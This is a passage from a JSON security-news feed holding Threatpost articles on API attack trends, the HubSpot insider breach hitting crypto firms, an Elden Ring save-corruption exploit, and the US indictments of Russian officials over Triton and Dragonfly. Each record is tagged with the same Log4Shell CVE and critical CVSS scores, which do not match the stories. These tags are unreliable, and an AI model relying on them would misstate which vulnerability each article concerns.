percent increase in attack takeovers. Dead-set on gift card fraud via \u201cscrape for resale\u201d and other types of fraud, the attacks spiraled up to the rate of 700,000 attacks per day.\n\nIn a separate case \u2013 of a loan application fraud attack \u2013 the threat actors used the sub accounts feature on public email domains such as Gmail to create 3,000 email addresses, which were then used to submit roughly 45,000 fraudulent loan applications distributed across multiple IP addresses.\n\nBoth are examples of [API attacks](<https://www.reblaze.com/wiki/api-security/what-is-an-api-attack/>): attacks that prey on application programming interfaces (APIs) that \u201chave become the glue that holds today\u2019s apps together.\u201d as Cequence SecurityHacker-in-Residence Jason Kent explained for Threatpost in his August 2021 InfoSec Insider [article](<https://threatpost.com/top-3-api-vulnerabilities-cyberattackers/169048/>) on the top 3 API security vulnerabilities and how cyberattackers use them to pwn apps.\n\n\u201cThere\u2019s an API to turn on the kitchen lights while still in bed. There\u2019s an API to change the song playing on your house speakers. Whether the app is on your mobile device, entertainment system or garage door, APIs are what developers use to make applications function,\u201d Kent wrote.\n\n## How API Glue Sticks\n\nKent explained that APIs are attractive to both developers and attackers because they can operate much like a URL might operate: \u201cTyping \u2018www.example[.]com\u2019 into a web browser will elicit a response from example.com. Search for your favorite song and you will see the following in the URL bar: \u2018www.example.com/search?{myfavoritesong},'\u201d he wrote. \u201cThe page result is dynamically built to present you with your search findings.\n\n\u201cYour mobile banking app operates in the same manner, with the API grabbing your name, account number and account balance \u2013 and populating the fields in the pre-built pages accordingly. While APIs have similar characteristics to web applications, they are far more susceptible to attacks; they include the entire transaction, including any security checks, and are typically communicating directly to a back-end service.\u201d\n\nThese issues aren\u2019t new, he said: \u201cIn the late 1990s folks figured out that you could often drop a single quote \u201d \u2018 \u201d into a search box or login field and the application would respond with a database error. Understanding SQL database syntax means that a vulnerable application was simply a wide-open application that one could potentially have total control over. And once found, SQL vulnerabilities were often attacked.\u201d\n\nHistory keeps repeating itself, but threat actors\u2019 abuse of APIs keeps evolving. Cequence \u2013 which markets its API Security Platform \u2013 accordingly keeps tabs on trends in API abuse.\n\n## API Security Threat Report\n\nLast week, Cequence released its \u201cAPI Security Threat Report: Bots and Automated Attacks Explode,\u201d revealing that both developers and attackers are head over heels in love with APIs, for better or worse. Of the 21.1 billion transactions analyzed by Cequence Security in the last half of 2021, 14 billion (70 percent) were API transactions, the firm said in a [press release](<https://www.cequence.ai/news/cequence-security-releases-report-revealing-top-3-attack-trends-in-api-security/>) announcing the report ([PDF](<https://www.cequence.ai/wp-content/uploads/2022/03/Cequence-Threat-API-Security.pdf>)).\n\nKent dropped in on the Threatpost podcast last week to talk about the following three attack trends that Cequence highlighted in its recent report:\n\n * **Gift card fraud, loan fraud and payment fraud, **such as the two attacks on retailers described above.\n * **More sophisticated shopping bots,** with bots-as-a-service (BaaS) allowing anyone to buy, rent and subscribe to a network of malicious bots and use it to acquire high-demand items. Bots drove the traffic to 36M (1200 percent) to 129M (4300 percent) above normal, with up to 86 percent of the transactions being malicious.\n * **The account takeover cat-and-mouse game. \u201c**Attack patterns went from massive in nature, with malicious ATOs making up 80% of the login traffic, to the polar opposite patter of low, slow and perfectly formed transactions,\u201d according to Cequence.\n\n## Fending Off API Attacks\n\nIn our interview, Jason also offered advice for organizations to detect these API attacks, with an emphasis on machine-learning models.\n\nBut the most important element of defense is discovery, he stressed: \u201cYou have to know what you have. It\u2019s the foundation and the basis of every security paradigm and program,\u201d he said. \u201cKnowing which APIs you have, we\u2019re finding, is paramount for organizations.\n\n\u201cWe see things like, they\u2019ll move to Version 16 of their API. So their calls are slash new 16 slash login. But is 15 still on? Is 14 still on? Why am I still seeing traffic on one? Having that inventory of what\u2019s functioning and what\u2019s going on right now is becoming one of those things where organizations are seeing so much,\u201d he said.\n\nSeeing is believing. If your organization heeds his advice and delves into discovery, expect to see just how much attention threat actors are lavishing on APIs.\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/031722_Cequence_mixdown.mp3>). For more podcasts, check out Threatpost\u2019s[ podcast site](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>).\n\nAs well, here\u2019s a link to an article by Jason that he discusses in the podcast, entitled [Gmail Farming and Credential Validation](<https://www.cequence.ai/blog/gmail-farming-and-credential-validation/>).\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our_**[ **_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-24T13:00:59", "type": "threatpost", "title": "Top 3 Attack Trends in API Security \u2013 Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-24T13:00:59", "id": "THREATPOST:2188E3E33D86C2C3DF35253A3ED7FA6C", "href": "https://threatpost.com/top-3-attack-trends-in-api-security-podcast/179064/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-24T17:16:18", "description": "A rogue employee working at HubSpot \u2013 used by more than 135,000 ([and growing](<https://www.hubspot.com/customer-spotlight>)) customers to manage marketing campaigns and on-board new users \u2013 has been fired over a breach that zeroed in on the company\u2019s cryptocurrency customers, the company [confirmed](<https://www.hubspot.com/en-us/march-2022-security-incident>) on Friday.\n\nThe breach has rippled through the crypto industry: As of Monday, crypto lending platform [BlockFi](<https://twitter.com/BlockFi/status/1504982848771608586>), bitcoin-purchasing automation platform [Swan Bitcoin](<https://twitter.com/SwanBitcoin/status/1505261139571191813>), bitcoin company [NYDIG](<https://nydig.com/>), peer-to-peer payments technology company Circle and cryptocurrency fund [Pantera Capital](<https://panteracapital.com/>) (which [was hit](<https://twitter.com/PanteraCapital/status/1362140521800622080?s=20&t=vQKoYhpK4bHoFjtc9V2KjQ>) a month prior) had been affected.\n\nThat list comes from the financial media outlet [Blockworks](<https://blockworks.co/nydig-blockfi-pantera-circle-all-targeted-in-hubspot-data-breach/>), which has reviewed emails the companies have sent to customers, along with public tweets, advising customers on how to stay safe.\n\nThe damage was minimal, HubSpot said in its March 18 notification: The thieves exported data from fewer than 30 customer portals. It\u2019s already notified the victimized companies, the company said.\n\nThreatpost asked HubSpot for a full list of affected HubSpot cryptocurrency customers, as well as confirmation of what superpowers its super admins have over customer data stored in the customer relationship management (CRM) platform. It responded by referring to one of those \u201cwe\u2019ve been breached\u201d canned [statements](<https://ir.hubspot.com/news/hubspots-statement-regarding-march-18-2022-security-incident>) that breached companies tend to put out: namely, \u201c\u200b\u200bWe take the privacy of our customers and their data incredibly seriously.\u201d\n\n## \u2018Bad Actor\u2019 Has Been Canned\n\nHubSpot said that it learned on Friday that a \u201cbad actor\u201d had compromised a HubSpot employee account \u2013 namely, what sounds like one of the \u2018super admin\u2019 accounts HubSpot has on both internal and external sides of its platform, [according to](<https://bitcoinmagazine.com/business/how-hubspot-data-breach-hits-bitcoiners>) another HubSpot super admin \u2013 and that the attack was focused on stealing data from its cryptocurrency industry customers.\n\n> \u201cWe have terminated access for the compromised HubSpot employee account and removed the ability for other employees to take certain actions in customer accounts.\u201d \u2014HubSpot\n\nThe rogue employee was attempting to access contact data, HubSpot [said](<https://www.cmswire.com/digital-marketing/hackers-target-cryptocurrency-companies-in-hubspot-data-breach/>). [CMS Wire](<https://www.cmswire.com/digital-marketing/hackers-target-cryptocurrency-companies-in-hubspot-data-breach/>) reported that HubSpot handed over details about the employee\u2019s actions to affected customers.\n\n## Data Stolen That Never Should Have Been There\n\nOn Saturday, the day after HubSpot reported the breach, Swan Bitcoin reassured customers that it uses HubSpot for \u201climited client communication and marketing data,\u201d not for financial information, transactions, or other sensitive personal or financial information.\n\n\u201cYou don\u2019t have to do anything,\u201d Swan reassured customers: \u201cYour funds are safe. Your Bitcoin is not at risk.\u201d\n\n> Yesterday, Hubspot, a third-party marketing vendor, confirmed a bad actor within their company gained access to Swan client marketing data.\n> \n> Read Cory\u2019s email to clients in the attached screenshots for details.\n> \n> We\u2019ll keep you updated. [pic.twitter.com/qtXVk5AOW8](<https://t.co/qtXVk5AOW8>)\n> \n> \u2014 Swan Bitcoin (@SwanBitcoin) [March 19, 2022](<https://twitter.com/SwanBitcoin/status/1505261139571191813?ref_src=twsrc%5Etfw>)\n\nAt least initially, it looked like data swept up in the breach was limited to names, emails, account types, phone numbers and, in some cases, company names, Swan said. The exfiltrated data didn\u2019t include Social Security numbers, tax IDs, birth dates, government IDs, bitcoin addresses or balances, according to Swan CEO Cory Klippstein.\n\nBut as of Tuesday, the situation looked a bit more grim, as Swan followed up with more details uncovered in its forensic investigation. It turns out that 0.2 percent of the dataset included \u201ca limited historical snapshot of USD deposits,\u201d the company said \u2013 an inclusion that\u2019s \u201cagainst company policy.\u201d The company said that it\u2019s conducted a post-mortem to ensure that the slippage won\u2019t happen again.\n\nAs well, about 1.2 percent of the dataset included clients\u2019 intended investment areas or the median net worth of their approximate geographic locales.\n\n\u201cAll of this sensitive data has been removed from client communications services, Klippstein [tweeted](<https://twitter.com/SwanBitcoin/status/1506355008127877123/>).\n\nhttps://twitter.com/SwanBitcoin/status/1506355008127877123/\n\nThe fact that sensitive financial or personal data weren\u2019t included in the dataset is a positive. But there\u2019s still plenty of damage that can be done with the details that were exfiltrated, security specialists \u2013 and that HubSpot Super Admin \u2013 hastened to point out, starting with [social](<https://threatpost.com/phony-instagram-support-staff-emails-hit-insurance-company/178929/>) [engineering](<https://threatpost.com/phishing-campaign-targeted-those-aiding-ukraine-refugees/178752/>) attacks.\n\n## Just What Data Do CRMs Handle?\n\nHubSpot officials told CMS Wire that \u201cSome employees have access to HubSpot accounts,\u201d which allows certain employees \u2013 such as account managers and support specialists \u2013 to help out customers. \u201cIn this case, a bad actor was able to compromise an employee account and make use of this access to export contact data from a small number of HubSpot accounts,\u201d HubSpot reportedly said.\n\nIn writing for [Bitcoin Magazine](<https://bitcoinmagazine.com/business/how-hubspot-data-breach-hits-bitcoiners>), HubSpot super admin Robert Warren described exactly what can be done with his level of access rights, which, internally, allows employees to \u201chop between company accounts and export contact lists (and potentially all associated CRM data).\u201d\n\n\u201cWhile it is true that financial data is not stored in the CRM, you should be aware that data associated with the users of these companies and their behaviors is logged in the CRM,\u201d Warren wrote. \u201cThis puts users in a unique position to be targeted in social engineering attacks.\u201d\n\nHe gave the following examples of the types of data that CRM systems can store and which may have been exported in the HubSpot breach:\n\n * IP addresses\n * Email histories with representatives at the associated companies and any messages or notes those representatives have on customers and their accounts\n * Customer browsing behavior on associated company websites\n * Mailing and/or shipping addresses\n * How customers are characterized internally by companies (\u201cbig buyer,\u201d \u201cwhale,\u201d \u201cmid-sized contact,\u201d \u201csmall user,\u201d etc.)\n * Individual customers\u2019 financial value to companies\n * Any and all deals customers have done with compromised companies and any associated values, email negotiations or contacts\n * Help tickets or requests customers have logged with compromised companies\n\n## Breach Is \u2018Not Surprising\u2019\n\nCamellia Chan, CEO and founder of embedded artificial intelligence (AI) company X-PHY (a [Flexxon](<https://www.flexxon.com/>) brand), told Threstpost that given the surge in digital currency development, the breach \u201cisn\u2019t terribly surprising_._\u201d\n\n\u201cSurges in technological advancement create the perfect environment for cybercrime to flourish,\u201d Chan said. \u201cSo, with the rapid development of digital currencies was sure to come a rise in the cybersecurity risks associated with it.\u201d\n\nThe incident spotlights a much wider issue, Chan said: namely, the quantity of sensitive data that these types of organizations store across the enterprise.\n\nIt \u201cputs not only a specific business at risk, but threatens the potential growth, development, and future success of the entire digital currency industry,\u201d the CEO said.\n\n## Data Shared with Third-Parties Slips Out of Your Hands\n\nChris Clements, vice president of solutions architecture at cybersecurity company Cerberus Sentinel, told Threatpost that software-as-a-service (SaaS) and managed service providers are tempting targets, given that cybercriminals know that if they successfully compromise the provider, \u201cthey will likely gain access to the data or networks of hundreds or thousands of the providers\u2019 downstream customers.\n\n\u201cIt\u2019s a shortcut to mass exploitation that could otherwise take the attacker months or even years to achieve independently,\u201d Clements said via email.\n\nWord to the wise, HubSpot customers. Clements said that it\u2019s \u201cimperative\u201d for organizations to understand that whatever data they share with third-party partners or vendors \u201clargely becomes out of their control and with little recourse should it be stolen if the 3rd party is compromised.\u201d\n\nClements advised that all third parties be part of a regularly updated risk analysis based on the level of access or sensitivity of data shared with them.\n\n\u201cThe results of the risk analysis should inform a cybersecurity strategy for partner or vendor controls and mitigations to provide higher level of security assurance as is deemed necessary,\u201d he continued.\n\nSuch assessments should be backed up by mechanisms that verify that third parties are \u201ctaking appropriate steps to provide the needed security assurances and that they can prove it by sharing details about their controls or results of independent validation like a penetration test,\u201d Clements said.\n\n\u201d Not all vendors or partners can or will share this with their customers, but it\u2019s critical that in absence of that an organization throw up their hands as if nothing further can be done,\u201d he emphasized.\n\nHe gave these example of what questions should be covered:\n\n * Are there controls or safeguards built into the service platform that offer tighter controls or enhanced monitoring capabilities?\n * Are there operational processes that can limit potential data exposure from a breach of a partner like maximum data retention lifetimes?\n * At worst, is it no longer an acceptable risk to continue to do business with the company and to seek out alternatives?\n\n\u201cThese are all best practices for cybersecurity 3rd party management, but in order for them to be comprehensively applied, your organization requires a true culture of security that ensures that all external data sharing is evaluated for compliance with its own cybersecurity goals,\u201d he suggested.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-24T17:11:40", "type": "threatpost", "title": "HubSpot Data Breach Ripples Through Crytocurrency Industry", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-24T17:11:40", "id": "THREATPOST:48FD4B4BFA020778797D684672C283B0", "href": "https://threatpost.com/hubspot-data-breach-crytocurrency-industry/179086/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-24T19:25:29", "description": "The latest installment of the Dark Souls gaming franchise, Elden Ring, contains a security vulnerability that allows bad actors to throw players on PCs into an endless loop of losing their characters\u2019 lives, rendering it essentially unplayable.\n\nMalwarebytes Labs researcher Christopher Boyd [said Thursday](<https://blog.malwarebytes.com/hacking-2/2022/03/elden-ring-exploit-traps-players-in-infinite-death-loop/>) that the bug appears to be a remote code-execution flaw that is being exploited to render the game unplayable for victims.\n\nThe late February [release of Elden Ring](<https://www.fromsoftware.jp/ww/pressrelease_detail.html?tgt=20220316_eldenring_salesdata>) went off smoothly for a time, and PC players were able to access online play without incident. In fact, on March 16, the Tokyo-based company announced that the sandbox game had sold 1 million units in Japan and more than 12 million worldwide.\n\nThe backstory behind Elden Ring was written by George R.R. Martin, the author of the book used as the source material create the hit television epic, \u201cGame of Thrones.\u201d\n\n\u201cIt\u2019s astonishing to see just how many people have been playing \u2018Elden Ring,'\u201d FromSoftware CEO Hidetaka Miyazaki said. \u201cI\u2019d like to extend our heartfelt thanks on behalf of the entire development team. \u2018Elden Ring\u2019 is based on a mythological story written by George R. R. Martin. We hope players enjoy a high level of freedom when adventuring through its vast world, exploring its many secrets, and facing up to its many threats.\u201d\n\n## **Elden Ring\u2019s \u2018Death Loop\u2019 **\n\nThe smooth sailing ended about a week ago, when attackers found a way to break into PC players\u2019 games and throw their avatars into an endless loop of dying, coming back and quickly dying again, something Boyd referred to as a \u201cdeath loop.\u201d\n\n\u201cAfter the first time your character dies, you\u2019re supposed to respawn at locations resembling a bonfire, Instead, in the death loop scenario the victim simply continues to die over and over again,\u201d Boyd explained.\n\nOne player tweeted about the bug in the latest Souls\u2019 game.\n\n\u201cThere\u2019s an exploit going around on PC where hackers will corrupt your save file while you\u2019re invaded,\u201d the player tweeted. \u201cFirst, they will crash your game, and when you open it back up, your character will be constantly falling to their death\u2026\u201d\n\n> \u26a0\ufe0fElden Ring PSA for PC players\u26a0\ufe0f\n> \n> There's an exploit going around on PC where hackers will corrupt your save file while you're invaded. \n> \n> First they will crash your game, and when you open it back up, your character will be constantly falling to their death\u2026 [pic.twitter.com/8et3bl8T1I](<https://t.co/8et3bl8T1I>)\n> \n> \u2014 Mordecai (@EldenRingUpdate) [March 18, 2022](<https://twitter.com/EldenRingUpdate/status/1504958027925008387?ref_src=twsrc%5Etfw>)\n\nBoyd said no one is exactly sure what\u2019s going on, since FromSoftware hasn\u2019t released any specifics about the exploit.\n\n\u201cOne of the theories from players is that the invaders were able to edit their save files somehow while in game, or at least adjust some parameters related to the victim\u2019s save points,\u201d Boyd added. \u201cIn other words: You no longer spawn at the nearest bonfire. You respawn somewhere over the nearby ocean and die instantly on account of not being able to swim.\u201d\n\nThe only way for PC players to completely avoid the possibility of falling victim to the bug is to switch off online play, Boyd advised.\n\n\u201cAnyone trapped in a death loop has to attempt an ALT + F4/rapid-fire sequence of button presses in menus to try to manually respawn at a bonfire,\u201d Boyd said. \u201cThis, as it turns out, isn\u2019t easy to do.\u201d\n\nThe good news is that FromSoftware has released an [Elden Ring patch](<https://en.bandainamcoent.eu/elden-ring/news/elden-ring-patch-notes-1032>) for this exploit, as well as others impacting players. Players without the update will be barred from online play, the company added.\n\n## Other Dark Nights of the Soul for Dark Souls\n\nThis isn\u2019t the first time that the developer has faced issues with the Dark Souls series. Boyd pointed out that in January, leading up to the Elden Ring release, developer FromSoftware was confronted with a [similar RCE exploit](<https://threatpost.com/dark-souls-servers-down-rce-bug/177896/>) in Dark Souls 3 that forced it to shut down online play for PC players.\n\nThe flaw could allow attackers to do pretty much anything: As Kaspersky researchers [explained](<https://www.kaspersky.com/blog/dark-souls-dangerous-vulnerability/43436/>) at the time, the bug \u201callows an attacker to execute almost any program on the victim\u2019s computer, so they\u2019re able to steal confidential data or execute any program they wish\u201d \u2013 that includes installing malware, letting them access sensitive information or enabling them to rip off resources for [cryptocurrency mining](<https://threatpost.com/bogus-cryptomining-apps-google-play/168785/>).\n\nThe vulnerability also affected earlier games in the Dark Soul series, leading the developers to temporarily turn off player-versus-player (PvP) servers across Dark Souls Remastered, Dark Souls II and Dark Souls III. PvP refers to players being able to interact and duel with each other.\n\n\u201cHopefully the last we\u2019ll see of game invading/save locking/character murdering exploits along these lines,\u201d Boyd explained. \u201cSave points in Souls titles are supposed to be the one safe breathing space in the entire game. To have them corrupted or tampered with and cursed with instant death is probably a bridge too far for even the most hardcore of Souls players.\u201d\n\n_**Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-24T19:23:12", "type": "threatpost", "title": "Just-Released Dark Souls Game, Elden Ring, Includes Killer Bug", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-24T19:23:12", "id": "THREATPOST:E424D9CD1C692F91FBD97FDDEDBCCE34", "href": "https://threatpost.com/dark-souls-game-elden-ring-killer-bug/179090/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-29T23:16:23", "description": "The U.S. Department of Justice (DOJ) has [indicted](<https://www.justice.gov/opa/pr/four-russian-government-employees-charged-two-historical-hacking-campaigns-targeting-critical>) four Russian government employees in connection to plots to cyber-fry critical infrastructure in the United States and beyond, including at least one nuclear power plant.\n\nThe campaigns involved one of the most dangerous malwares ever encountered in the operational technology and energy sectors: Triton, aka Trisis, a Russia-linked malware used to shut down an oil refinery in 2017 and [another Mideast target](<https://threatpost.com/triton-ics-malware-second-victim/143658/>) in 2019.\n\nTwo related indictments were unsealed yesterday: one that named Evgeny Viktorovich Gladkikh ([PDF](<https://www.justice.gov/opa/press-release/file/1486831/download>)), an employee of the Russian Ministry of Defense, and another ([PDF](<https://www.justice.gov/opa/press-release/file/1486836/download>)) that named three officers in Military Unit 71330 \u2013 or \u201cCenter 16\u201d \u2013 of Russia\u2019s Federal Security Service (FSB), which is the successor to Russia\u2019s KGB.\n\nCenter 16 is the FSB\u2019s main structural unit for signals intelligence, consisting of a central unit housed in unmarked administrative buildings spread across Moscow and secluded forest enclosures, with massive satellite dishes pointing out to listen to the world. It\u2019s known by cybersecurity researchers as \u201cDragonfly,\u201d \u201cEnergetic Bear\u201d and \u201cCrouching Yeti.\u201d\n\n## $10M Reward for Intel on FSB Officers\n\nThere\u2019s a reward on the heads of the trio of FSB officers for allegedly hacking a refinery. The State Department [said](<https://www.state.gov/rewards-for-justice-reward-offer-for-information-on-russian-fsb-officers-conducting-malicious-activity-against-u-s-critical-infrastructure-between-2012-2017/>) on Thursday that its Rewards for Justice (RFJ) program is offering $10 million for information on the three, whose names are Pavel Aleksandrovich Akulov, Mikhail Mikhailovich Gavrilov and Marat Valeryevich Tyukov.\n\nThe officers were allegedly involved in computer intrusions, wire fraud, aggravated identity theft and damage to an energy facility. The reward marks the first time that RFJ has named a foreign government security personnel under its critical infrastructure reward offer, the State Department said.\n\n## Triton/Trisis\n\nTriton was allegedly used in campaigns run between May and September 2017.\n\nResearchers have compared Triton\u2019s targeting of industrial control systems (ICS) to malware used in the watershed attacks [Stuxnet](<https://threatpost.com/stuxnets-first-five-victims-provided-path-to-natanz/109291/>) and Industroyer/Crashoverride, the latter of which is a backdoor that targets ICS and which took down the Ukrainian power grid in Kiev in 2016. In 2018, research revealed that Industroyer [was linked](<https://threatpost.com/notpetya-linked-to-industroyer-attack-on-ukraine-energy-grid/138287/>) to the massive [NotPetya](<https://threatpost.com/merck-insurance-payout-notpetya-attack/177872/>) ransomware outbreak that crippled organizations around the world the year before.\n\nAccording to the indictment, between May and September 2017, Gladkikh, a 36-year-old computer programmer employed by an institute affiliated with the Russian Ministry of Defense, was involved in a campaign to hack global energy facilities \u201cusing techniques designed to enable future physical damage with potentially catastrophic effects.\u201d The hacking allegedly led to two separate emergency shutdowns at a foreign facility.\n\nAlong with co-conspirators, Gladkikh allegedly hacked the systems of \u201ca foreign refinery\u201d (presumably Saudi oil giant Petro Rabigh) in 2017 and installed Triton/Trisis malware on a safety system produced by Schneider Electric. Triton actually takes its name from the fact that it\u2019s designed to target Triconex safety instrumented system (SIS) controllers, which are sold by Schneider Electric. Triton surfaced again in 2019, when it was again [used to target](<https://threatpost.com/triton-ics-malware-second-victim/143658/>) an undisclosed company in the Middle East.\n\nTriton was designed to prevent the refinery\u2019s safety systems from functioning \u2013 \u201cby causing the ICS to operate in an unsafe manner while appearing to be operating normally,\u201d the DOJ said \u2013 thereby leaving the refinery open to damage and jeopardizing anybody nearby.\n\n\u201cWhen the defendant deployed the Triton malware, it caused a fault that led the refinery\u2019s Schneider Electric safety systems to initiate two automatic emergency shutdowns of the refinery\u2019s operations,\u201d the DOJ said. Between February and July 2018, Gladkikh and his crew allegedly researched and (unsuccessfully) tried to hack the computer systems used by a U.S. company with similar refineries.\n\nAs energy news outlet E&E News [reported](<https://www.eenews.net/articles/the-inside-story-of-the-worlds-most-dangerous-malware/>) in 2019, in the early evening of Aug. 4, 2017, two emergency shutdown systems sprang to life at Petro Rabigh\u2019s sprawling refinery along Saudi Arbia\u2019s Red Sea coast. Engineers working the weekend shift were oblivious, even as the systems knocked the complex offline \u201cin a last-gasp effort to prevent a gas release and deadly explosion.\u201d\n\n\u201c[They] spotted nothing out of the ordinary, either on their computer screens or out on the plant floor,\u201d according to E&E News.\n\nGladkikh has been charged with three counts: conspiracy to cause damage to an energy facility, attempt to damage an energy facility, and one count of conspiracy to commit computer fraud.\n\n## FSB Officers\u2019 Indictment: The Dragonfly Supply-Chain Attack\n\nThe indictment that names the FSB officers alleges that, between 2012 and 2017, Akulov, Gavrilov, Tyukov and their co-conspirators engaged in computer intrusions, including supply chain attacks, \u201cin furtherance of the Russian government\u2019s efforts to maintain surreptitious, unauthorized and persistent access to the computer networks of companies and organizations in the international energy sector, including oil and gas firms, nuclear power plants, and utility and power transmission companies.\u201d\n\nSpecifically, they allegedly targeted the software and hardware that controls equipment in power generation facilities, known as ICS or Supervisory Control and Data Acquisition (SCADA) systems.\n\n\u201cAccess to such systems would have provided the Russian government the ability to, among other things, disrupt and damage such computer systems at a future time of its choosing,\u201d according to the DOJ\u2019s [press release](<https://www.justice.gov/opa/pr/four-russian-government-employees-charged-two-historical-hacking-campaigns-targeting-critical>).\n\nThe indictment describes a campaign against the energy sector that involved two phases: The first was a supply-chain attack that was commonly referred to as \u201cDragonfly\u201d or \u201cHavex\u201d by security researchers. Dragonfly took place between 2012 and 2014 and compromised computer networks of ICS/SCADA system manufacturers and software vendors.\n\nIt involved tucking the Havex remote-access trojan (RAT) [inside legitimate software updates](<https://threatpost.com/ics-malware-found-on-vendors-update-installers/106910/>). According to a 2014 advisory from the Industrial Control Systems Cyber Emergency Response Team (ICS-CERT), the Havex RAT targeted vendors via phishing campaigns, website redirects and, finally, by infecting the software installers. Three vendor websites were compromised in watering-hole attacks, the ICS-CERT advisory said.\n\n\u201cAfter unsuspecting customers downloaded Havex-infected updates, the conspirators would use the malware to, among other things, create backdoors into infected systems and scan victims\u2019 networks for additional ICS/SCADA devices,\u201d according to the DOJ. The gang allegedly managed to install malware on more than 17,000 unique devices in the United States and abroad, including ICS/SCADA controllers used by power and energy companies.\n\n## Dragonfly 2.0: Spearphishing a Nuclear Power Plant\n\nBetween 2014 and 2017, the campaign entered into what\u2019s commonly referred to as \u201cDragonfly 2.0,\u201d wherein the suspects allegedly turned their focus to specific energy sector entities and individuals and engineers who worked with ICS/SCADA systems.\n\nThis second phase entailed spearphishing attacks targeting more than 3,300 users at more than 500 U.S. and international companies and entities, in addition to U.S. government agencies such as the Nuclear Regulatory Commission.\n\nThe spearphishing attacks sometimes struck gold, including in the compromise of the business network (i.e., involving computers not directly connected to ICS/SCADA equipment) of the Wolf Creek Nuclear Operating Corporation (Wolf Creek) in Burlington, Kansas. Wolf Creek operates a nuclear power plant.\n\n\u201cMoreover, after establishing an illegal foothold in a particular network, the conspirators typically used that foothold to penetrate further into the network by obtaining access to other computers and networks at the victim entity,\u201d according to the DOJ.\n\nDragonfly 2.0 also entailed a watering-hole attack wherein the alleged attackers exploited publicly known vulnerabilities in [content management software ](<https://threatpost.com/threatlist-wordpress-vulnerabilities/140690/>)(CMS) to compromise servers that hosted websites commonly visited by ICS/SCADA system and other energy sector engineers. \u201cWhen the engineers browsed to a compromised website, the conspirators\u2019 hidden scripts deployed malware designed to capture login credentials onto their computers,\u201d the DOJ said.\n\nThe campaign targeted victims in the United States and in more than 135 other countries, the Feds said.\n\nThe FSB officers are looking at charges of conspiracy to cause damage to the property of an energy facility and commit 